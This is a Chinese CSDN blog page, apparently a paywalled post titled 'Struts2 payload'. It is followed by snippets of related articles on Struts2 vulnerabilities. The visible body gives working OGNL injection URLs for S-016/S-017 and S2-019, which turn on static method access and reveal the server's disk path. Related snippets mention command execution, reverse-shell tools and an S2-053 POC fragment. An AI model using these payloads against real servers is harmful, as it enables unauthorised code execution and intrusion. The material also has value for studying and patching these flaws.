Struts2 payload

最新推荐文章于 2022-04-18 12:01:00 发布
最新推荐文章于 2022-04-18 12:01:00 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_25449961/article/details/52415590
版权
本文详细探讨了Struts2框架中的一系列安全漏洞,包括S-016/S-017、S2-019、DevMode、远程命令执行、S2-032和S2-037。特别提到了通过这些漏洞可以实现获取磁盘目录、执行命令及上传文件等高危操作,揭示了Struts2在安全性方面的问题。
摘要由CSDN通过智能技术生成

S-016/S-017

http://****.do?redirect:${%23w%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23w.println(%27it%20is%20vulerable.%27),%23w.flush(),%23w.close()}

S2-019

http://***/Custom_getOwnMustDoCustomBooks.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29,%23resp.getWriter%28%29.print%28%22dir:%22%29,%23resp.getWriter%28%29.println%28%23req.getSession%28%29.getServletContext%28%29.getRealPath%28%22/%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close

DevMode

http://***/szyx

最低0.47元/天 解锁文章
CN_CodeLab
关注
专栏目录
struts2反序列化
Finlinlts的博客
08-30 1345
​ 漏洞搭建 首先配置好Tomcat,然后将对应漏洞的版本下载到Tomcat目录下的webapp目录,访问对应的链接,例如http://127.0.0.1:8080/struts-032/,成功即搭建完成。
struts2最近几个漏洞分析&稳定利用payload
weixin_34301307的博客
03-08 687
genxor · 2014/02/11 11:48weibo:genxor0x00 背景看到网上关于struts2利用的文章非常多,但是对于漏洞触发跟踪分析的文档比较少,闲来无事跟踪了一下struts最近吵得比较火的两个漏洞,研究了一下能够稳定利用的payload。0x01 S2-008Struts2框架存在一个devmode模式,方便开发人员调试程序,但是默认devmode是不开启的,如果想要使...
Struts2标签 %{ } %{# }
laravel framework
04-20 150
struts2中的标签     s:a            中的href 什么时候使用“# ” 什么时候该用“%{ }”  什么时候该用“%{# }” 什么时候用“”     s:select      中的list 什么时候使用“# ” 什么时候该用“%{ }”  什么时候该用“%{# }” 什么时候用“”     s:if          中的test 什么时候使用“# ” 什么时候该...
struts2 s2-045初探
公众号shadow sock7
06-19 1450
https://github.com/Medicean/VulApps 使用它的docker镜像 用这个poc https://github.com/Medicean/VulApps/blob/master/s/struts2/s2-045/poc.py➜ VulApps/s/struts2/s2-045 master ✓ python poc.py http://127.0.0.1:808
Struts2漏洞之S2-016漏洞分析与exp编写
热门推荐
Exploit的小站~
05-10 3万+
 1、概述 S2-016是13年7月爆出的,那时候的我还没涉及Web安全研究。这次迟到的分析也算是对过去的补充。这个漏洞影响了Struts 2.3.15.1之前的所有版本。问题主要出在对于特殊URL处理中,redirectredirectAction后面跟上Ognl表达式会被服务器执行。 2、漏洞分析 分析开源框架的漏洞还是从其源码入手,问题出在了DefaultActiion...
struts2 最新漏洞 S2-016、S2-017修补方案
weixin_30315723的博客
07-18 229
昨天struts2爆了一个好大的漏洞,用道哥的话来说就是:“今天下午整个中国的黑客圈像疯了一样开始利用这个漏洞黑网站,大家可以感受一下。” 看下乌云这两天的数据: 相关报道: 灾难日:中国互联网惨遭Struts2高危漏洞摧残 Struts2被曝重要漏洞,波及全系版本 官方描述: S2-016:https://cwiki.apache.org/confluence/display/W...
Struts2最近几个漏洞分析&稳定利用Payload1
08-08
payload的主要目的是绕过Struts2的安全限制,通过设置`allowStaticMethodAccess`为true,允许执行静态方法。攻击者利用Java反射机制,通过`Runtime.getRuntime().exec()`方法执行系统命令,如`whoami`,获取服务器...
鬼哥struts2测试工具.rar_392_inject_struts2测试工具_鬼哥struts2
09-15
然而,正如标题“鬼哥struts2测试工具.rar_392_inject_struts2测试工具_鬼哥struts2”所示,这个压缩包涉及到的是针对Struts2框架的一个安全问题:Struts2漏洞利用工具。 描述中的"392 inject"可能指的是CVE-2017-...
Struts2漏洞利用工具Devmode版
10-26
Struts2是一款非常流行的Java Web框架,用于构建和维护动态网站应用程序。然而,如同其他复杂的软件系统,Struts2在过去的几年中也发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行、敏感信息泄露等问题,对...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
S2-016 远程代码执行漏洞
a1b2c3是弱口令
12-11 6737
struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 漏洞记录 S2-016 CVE-2013-2251 影响版本:Struts 2.0....
Struts2安全漏洞
solobear的专栏
07-27 7315
摘要:Struts应用开发框架目前广泛应用于大型互联网企业、政府、金融机构等网站建设,并作为网站开发的底层模板使用。近日网上公布了Struts一个严重的命令执行漏洞,在我国互联网环境影响巨大,本文将对这个漏洞进行分析和描述。 Struts是Apache软件基金会Jakarta项目组的一个开源项目,它采用MVC模式,帮助java开发者利用J2EE开发Web应用。目前,Struts广泛应用于大型
struts2综合漏洞扫描工具
qq_51478862的博客
04-16 1万+
python扫描工具更新2022-4-16 1.添加了S2-062漏洞利用 其实是对S2-061漏洞的绕过 支持命令执行,Linux反弹shell,windows反弹shell。 2.解决了了Windows反弹shell的功能 底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令 不成功的问题。 详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?# 《使用j
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9590
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
struts2漏洞学习总结
bcbobo21cn的专栏
06-24 2414
struts2安全漏洞 Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 目录 1 背景 2 内容 3 造成的影响: 4 应对措施: 背景 Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 内容 在2013年6月底发布的Struts 2.3.15版本被曝出存在
S2-016远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 3128
概述 S2-016是13年7月爆出的,那时候的我还没涉及Web安全研究。这次迟到的分析也算是对过去的补充。这个漏洞影响了Struts 2.3.15.1之前的所有版本。问题主要出在对于特殊URL处理中,redirectredirectAction后面跟上Ognl表达式会被服务器执行。 漏洞分析 分析开源框架的漏洞还是从其源码入手,问题出在了DefaultActiionMapper上,这个类主...
Struts2-S2-016/17
aming小老弟
04-18 1190
QQ 1285575001 Wechat M010527 技术交流 QQ群599020441 纪年科技aming #前文# 通过该实验了解java开发流行框架struts2安全缺陷形成的原因, 掌握基本的漏洞利用及使用方法, 并能够通过代码审计给出加固方案。 #基础知识# 了解Struts2 Struts是Apache软件基金会赞助的一个Java开源项目, 通过采用JavaServlet/JSP技术, 实现了基于Java EE Web应用的MVC设计模式的应用框架, 是MVC经典设计模式中的一个..
Struts2
weixin_34260991的博客
09-19 1694
Struts2_053 POC: %25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2...
Struts2漏洞分析:S2-008与稳定Payload探讨
"分析Struts2框架的漏洞,特别是S2-008和S2-016,以及创建稳定利用Payload的方法" Struts2是一个流行的Java Web应用程序框架,但随着时间的推移,它出现了一些安全漏洞。这篇文档主要探讨了两个备受关注的漏洞:S2-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值